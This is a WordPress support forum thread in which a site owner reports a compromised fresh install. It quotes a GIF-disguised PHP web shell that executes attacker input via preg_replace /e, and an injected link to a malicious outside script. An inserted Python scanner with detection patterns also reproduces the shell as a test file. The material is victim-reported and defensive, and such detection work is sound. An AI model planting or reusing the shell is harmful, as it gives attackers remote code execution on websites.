Title: exploit.php in New WordPress Install
Last modified: August 24, 2016

---

# exploit.php in New WordPress Install

 *  [Aventador](https://wordpress.org/support/users/aventador/)
 * (@aventador)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/)
 * Today a file called exploit.php was uploaded in a freshly installed WordPress
   site, into the wp-content/uploads directory, how is that possible…?

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [catacaustic](https://wordpress.org/support/users/catacaustic/)
 * (@catacaustic)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067681)
 * Could be many ways. Off the top of my head, there's…
    - Using an older version of WordPress with a known vulnerability (even 4.2 that
      was released only a short time ago has been upgraded to 4.2.1 to cover a new
      exploit that was found).
    - A plugin or theme that uses some sort of insecure forms, or scripts. Impossible
      to say without knowing exactly what your site is running.
    - Insecure file permissions on your server allowing other users to place files
      inside your file system.
    - A compromised server / web server software / firewall / other software or
      hardware issues.
 * There’s no one option, and no easy way to find out what it was. The best thing
   that you can do is ask your hosting company to confirm how that file was placed
   there in the first place. That’s the only real way to see where a possible weak
   point could be, otherwise you’re just trying to plug holes that may or may not
   be there.
 *  Thread Starter [Aventador](https://wordpress.org/support/users/aventador/)
 * (@aventador)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067887)
 * I think I can set permissions for the uploads directory with Filezilla, but which
   settings are the right ones, so only admins can upload stuff through WP…?
 * Yesterday, a file called ysh.php was uploaded to the /wp-content/uploads directory,
   and it looks like this:
    `GIF89a?china-ysh <?php if($_POST["err"]<>""){@preg_replace("/[checksql]/e",$_POST['err'],"saft");}?>`
 * And today, the Twenty Thirteen, Twenty Fourteen and Twenty Fifteen themes were
   injected with this code in the header.php file:
    `http://pocketrealty.ca/tvrzrqfg.php?id=171528%5c`
 * – Thanks.
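One way to hunt for files like the ysh.php sample above across a whole uploads tree, as an added example that is not part of the thread (the indicator patterns, the constructed temporary uploads directory and the function names are my own assumptions):

```python
import os
import re
import tempfile

# Indicator patterns built from the ysh.php sample quoted in the thread (assumed, not exhaustive).
PHP_OPEN = re.compile(rb"<\?php\b|<\?=", re.IGNORECASE)                 # PHP code is present
FAKE_IMAGE_HEADER = re.compile(rb"\A(GIF8[79]a|\xff\xd8\xff|\x89PNG)")  # image magic in front of code
PREG_EVAL = re.compile(rb"preg_replace\s*\(\s*[\x22\x27][^\x22\x27]*/[a-z]*e[a-z]*[\x22\x27]",
                       re.IGNORECASE)                                   # /e modifier evaluates the replacement
USER_INPUT = re.compile(rb"\$_(POST|GET|REQUEST|COOKIE)\b")            # payload taken from the request


def inspect_bytes(data):
    """Return the indicator names found in one file's content (empty list if clean)."""
    findings = []
    if not PHP_OPEN.search(data):
        return findings            # plain images and documents stop here
    findings.append("php-code")    # any PHP inside wp-content/uploads is already abnormal
    if FAKE_IMAGE_HEADER.match(data):
        findings.append("image-polyglot")
    if PREG_EVAL.search(data):
        findings.append("preg_replace-e")
    if USER_INPUT.search(data):
        findings.append("user-input")
    return findings


def scan_uploads(root):
    """Walk an uploads tree and map each suspicious relative path to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                hits = inspect_bytes(fh.read(64 * 1024))  # droppers are tiny; 64 KiB covers the header
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def demo():
    """Build a constructed uploads directory: one benign GIF stub plus the shell quoted in the thread."""
    root = tempfile.mkdtemp(prefix="uploads-")
    os.makedirs(os.path.join(root, "2015"))
    with open(os.path.join(root, "2015", "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00")   # constructed benign image stub
    with open(os.path.join(root, "ysh.php"), "wb") as fh:
        fh.write(b'GIF89a?china-ysh <?php if($_POST["err"]<>""){'
                 b'@preg_replace("/[checksql]/e",$_POST[\'err\'],"saft");}?>')
    return scan_uploads(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, "->", ", ".join(hits))
```

Point `scan_uploads()` at a real `wp-content/uploads` directory to get the same report; any hit is a file to quarantine and a reason to work through the cleanup steps in the codex page linked in the reply that follows.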
 *  [catacaustic](https://wordpress.org/support/users/catacaustic/)
 * (@catacaustic)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067889)
 * Your site has been hacked.
 * You should read [this page](https://codex.wordpress.org/FAQ_My_site_was_hacked)
   and follow the directions as this will help you to guard against this in the 
   future.

The topic ‘exploit.php in New WordPress Install’ is closed to new replies.

## Tags

 * [exploit](https://wordpress.org/support/topic-tag/exploit/)
 * [php](https://wordpress.org/support/topic-tag/php/)
 * [wp-content](https://wordpress.org/support/topic-tag/wp-content/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 2 participants
 * Last reply from: [catacaustic](https://wordpress.org/support/users/catacaustic/)
 * Last activity: [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067889)
 * Status: not resolved